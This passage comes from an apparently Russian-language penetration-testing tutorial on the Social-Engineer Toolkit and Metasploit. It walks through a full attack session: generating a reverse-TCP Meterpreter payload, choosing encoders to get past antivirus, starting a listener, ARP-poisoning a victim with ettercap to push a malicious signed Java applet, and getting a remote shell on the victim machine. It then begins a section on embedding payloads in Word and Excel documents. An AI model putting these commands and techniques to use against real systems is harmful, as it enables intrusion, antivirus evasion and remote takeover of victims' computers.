java applet code. When you entice a victim to the website
either through social-engineering, a XSS vulnerability,
E-Mail, or other options, it will prompt the user to say
"Yes" to run the applet signed by Microsoft. Once accepted
a payload will be run on the remote system and executed.
 
The payload itself will be generated dynamically through
Metasploit and the handler and everything be setup for you
automatically through the SEF Web Attack toolkit.
 
Do you wish to continue? y/n: y
What payload do you want to generate:
 
Name:                                      Description:
 
1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
 
Enter choice (example 1-4): 2
 
Below is a list of encodings to try and bypass AV.
 
Select one of the below, Avoid_UTF8_tolower usually gets past them.
 
1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding
 
Enter your choice : 2
 
Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 10.211.55.130
Enter the port of the Listener: 4444
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 274
Options: LHOST=10.211.55.130,LPORT=4444,ENCODING=shikata_ga_nai
Do you want to start a listener to receive the payload yes or no: yes
 
Launching Listener...
***********************************************************************************************
 
Launching MSFCONSOLE on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
 
Listening on IP: 10.211.55.130 on Local Port: 4444 Using encoding: ENCODING=shikata_ga_nai
 
***********************************************************************************************
 
Would you like to use ettercap to ARP poison a host yes or no: yes
 
Ettercap allows you to ARP poison a specific host and when they browse
a site, force them to use oursite and launch a slew of
exploits from the Metasploit repository. ETTERCAP REQUIRED.
 
 
What IP Address do you want to poison: 10.211.55.140
Setting up the ettercap filters....
Filter created...
Compiling Ettercap filter...
 
etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA
 
 
 12 protocol tables loaded:
        DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth
 
 11 constants loaded:
        VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP
 
 Parsing source file 'src/program_junk/ettercap.filter'  done.
 
 Unfolding the meta-tree  done.
 
 Converting labels to real offsets  done.
 
 Writing output to 'src/program_junk/ettercap.ef'  done.
 
 -> Script encoded into 16 instructions.
 
Filter compiled...Running Ettercap and poisoning target...
 
 
***************************************************
Web Server Launched. Welcome to the SEF Web Attack.
***************************************************
 
 
 [--] Tested on IE6, IE7, IE8 and FireFox [--]
 
 
Type -c to exit..

Давайте взглянем на браузер жертвы.

brauser

Уведомление в нижнем левом углу, что URL был заменен на сайте нашим вредоносным сайтом. Как только жертва выполнит обычный поиск в google, произойдет следующее.

warrning

Обратите внимание, что предупреждение о безопасности просит довериться приложению, подписанным корпорацией Microsoft. После того как пользователь принимает и запускает приложение, мы получаем shell:

[*] Exploit running as background job.
msf exploit(handler) > 
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (10.211.55.130:4444 -> 10.211.55.140:1129)
 
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
 
meterpreter > execute -f cmd.exe -i
Process 2596 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
 
C:\Documents and Settings\Administrator\Desktop>

SET по прежнему находится в стадии разработки и новые атаки будут добавлены в нее далее. Чтобы сделать вашу атаку социальной инженерии легче, SET использует несколько векторов нападения.

Методы инфицирования VBScript.

Metasploit имеет несколько встроенных методов которые можно использовать для внедрения в документы Word и Excel полезной нагрузки. Вы можете использовать нагрузку собственного изготовления. Она не обязательно должна входить в состав Metasploit. Этот метод может быть полезен в случае пост-атаки на стороне клиента, когда стоит фильтрация запрещающая пропуск исполняемых файлов и разрешающая файлы документов.
Перво-наперво, создадим VBScript и заставим Metasploit прослушивать порт на удаленный коннект.

root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 ENCODING=shikata_ga_nai X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 280
Options: LHOST=10.211.55.162,LPORT=8080,ENCODING=shikata_ga_nai
root@bt4:/pentest/exploits/framework3# mv payload.exe tools/
root@bt4:/pentest/exploits/framework3# cd tools/